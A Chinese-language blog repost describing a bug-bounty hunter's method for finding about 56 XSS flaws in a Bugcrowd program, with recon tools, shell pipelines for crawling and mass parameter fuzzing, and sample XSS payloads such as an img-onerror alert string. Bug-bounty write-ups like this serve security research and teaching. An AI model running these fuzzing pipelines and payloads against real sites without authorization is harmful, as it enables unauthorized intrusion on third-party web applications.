<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    如何在Bugcrowd公共項目中找到50多個XSS漏洞

    VSole2022-04-20 14:14:00

    聲明:文章中涉及的程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,讀者將其信息做其他用途,由用戶承擔全部法律及連帶責任,文章作者不承擔任何法律及連帶責任。

    背景介紹:

    今天的分享來自一位名為Takshal(tojojo)的白帽子,他是一名來自印度的網絡安全研究員和開發人員。他在信息安全行業有著3年以上的經驗,同時也有自己的YouTube頻道,這也是他的第一篇文章,廢話不多說,讓我們看看這位小哥如何在公共項目中找到50個以上的XSS(跨站點腳本攻擊)漏洞。

    出于安全原因,目標站點統一稱之為abc.com。

    選定目標后,無非就是目標偵查和收集工作了,在此過程中小哥使用到工具有:

    • AssetFinder
    • SubFinder
    • Amass
    • Find-domain
    • Google Dorking

    (注意:以上這些工具通常用于發現目標子域)

    運行工具后,小哥收集到了576個子域信息,下一個過程是找到活躍的子域數量,對于這個過程,很多白帽子使用HTTPX,速度也會快一些,但白帽小哥更喜歡使用HTTProbe,這是由安全研究員Tomonomnom制作的工具,因為白帽小哥也是Tomnonom的鐵粉,

    這兩個工具都有自己的算法來識別子域中的開放端口,具體命令如下:

    $ cat subdomains.txt | httprobe | tee -a host.txt
    

    在探測過程后,成功找到了260個活躍主機,同時白帽小哥利用Google-Dorking技術找到一些目標子域的登錄頁面,于是,小哥決定這些登錄功能,其中一個子域:xyz.abc.com,在完成注冊過程后,小哥開始查看所有可用功能,在檢查了所有內容之后,他在URL中找到了一個易受攻擊的頁面,在那里能夠執行html注入,但卻只能注入20個字符,最終白帽小哥花了大約兩天的時間將html注入轉換為XSS Payload:

    <script/src=//?.?>script>
    

    于是,小哥很愉快的向Bugcrowd提交了漏洞報告,但是廠商卻在沒有通知他的情況下默默地修復了漏洞,并將漏洞報告標記為 N/A(不適用)。

    骨哥畫外音:原來老外也有這種騷操作~

    經歷了這件事之后,白帽小哥非常沮喪和失望,甚至產生了負面情緒,他甚至開始懷疑他的技能以及個人職業生涯,但最終小哥決定相信自己和這3 年來的工作經驗,所以他帶著自己開發的工具重回到該目標,這次他使用了自己開發的自定義爬蟲腳本工具,并在 waybackurl 腳本的幫助下,提取到了超過 5000,000個 abc.com 的所有子域中的站點信息,使用的命令是:

    cat host.txt | crawler | tee -a endpoint.txtcat host.txt | waybackurl | tee -a endpoint.txt
    

    在找到500萬個站點后,白帽小哥開始利用的qsreplace工具來Fuzz所有參數,以幫助其找到xss漏洞,命令如下:

    cat endpoint.txt | qsreplace ‘“><img src=x onerror=alert(1)> | tee -a xss_fuzz.txt
    

    執行命令后,小哥必須檢查這些Payload的響應,于是他創建了一個名為Freq的工具,該工具可以在小哥的GitHub庫中找到,具體執行此命令為:

    cat xss_fuzz.txt | freq | tee -a possible_xss.txt
    

    在這之后,白帽小哥成功找到了1000個站點,這些站點以明文形式響應了Payload,因此,小哥不得不手動檢查所有受影響的站點,白帽小哥總共報告了大約56個XSS漏洞,目前所有漏洞都已被平臺接受,還有一些其它的XSS漏洞報告尚待處理中。

    信息安全xss
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    隨著互聯網的高速發展,信息安全問題已經成為企業最為關注的焦點之一,而前端又是引發企業安全問題的高危據點。在移動互聯網時代,前端人員除了傳統的 XSS、CSRF 等安全問題之外,又時常遭遇網絡劫持、非法調用 Hybrid API 等新型安全問題。
    根據以上綜述,本周安全威脅為中。報告顯示,XSS漏洞占了報告的所有漏洞的18%,總計獲得了420萬美元的獎金。此外,不當訪問控制漏洞所獲得的獎金額度比去年同比增長134%,高達到400萬美元,其次是信息披露漏洞,同比增長63%。原文鏈接: 2、Pulse Secure發布企業推進零信任網絡的分析報告 Pulse Secure發布了有關企業推進零信任網絡的分析報告。企業管理協會副總Shamus McGillicuddy表示,企業顯然正在加快采取零信任網絡的步伐。
    我將使用Kali Linux作為此次學習的攻擊者機器。網絡釣魚攻擊是個人和公司在保護其信息安全方面面臨的最常見的安全挑戰之一。網絡釣魚攻擊的興起對所有組織都構成了重大威脅。這篇主要演示如何利用XSS植入釣魚,獲得管理員內部電腦權限!會彈出需要執行的XSS利用代碼...選擇標準代碼測試!
    AWS控制臺中的XSS
    2022-11-02 09:31:52
    它是通過 AWS 漏洞披露計劃報告的,現已修復。發現可以想象,對 AWS API 進行模糊測試并非易事。通過調試,很明顯它正在尋找 CloudTrail 事件的特定屬性,而 fuzzer 沒有提供它。此外,這些值似乎被直接插入到DOM中。因此,我認為任何惡意內容都會在顯示之前進行清理。雖然 CSP 不能減輕跨站點腳本攻擊的原因,但它可以減輕影響。AWS 安全團隊迅速做出回應,并表示他們已將信息轉發給服務團隊。
    工業信息安全資訊
    聲明:文章中涉及的程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,讀者將其信息做其他用途,由用戶承擔全部
    云計算的發展及普及應用,降低了軟硬件成本、提高了數據的可靠性,其業務按需快速定制, 時間快。但是由于云計算的開放及共享虛擬特性,使得存貯其上的信息必然面臨信息安全的挑戰。怎樣才能使得云計算安全運行于互聯網中是大家一直在探討的問題。針對互聯網環境中云計算運 行的傳統及固有安全問題,我們進行了詳細的闡述,并提出了科學、有效的信息安全防護方案,希 望對云計算運行以及互聯網的健康發展起到積極作用。
    下面詳細了解sql注入、xss攻擊及解決四個方面1. 什么是sql注入????所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。是最原始、最簡單的攻擊,從有了web2.0就有了sql注入攻擊。
    以下為信息安全各個方向涉及的面試題,星數越多代表問題出現的幾率越大,沒有填答案是希望大家如果不懂能自己動手找到答案,祝各位都能找到滿意的工作:) 注:做這個List的目標不是全,因為無論如何都不可能覆蓋所有的面試問題,更多的還是希望由點達面,查漏補缺。
    當前國家形勢的驅使,國家信息安全的發展經濟水平的不斷提升,就需要不斷的提升綜合國力而網絡安全領域的對抗也是我國核心競爭力的一種優勢;本質上是人與人之間的對抗,而網絡終端、網絡設備、介質以及各種工具和平臺僅僅是作為輔助手段而存在。因此如何使網絡安全人員合理的利用手中的各種工具和策略來提高網絡安全對抗水平,是培養“高素質的網絡安全和信息化人才隊伍”亟需解決的問題。網絡攻防演練成為各企事業單位,乃至國家
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类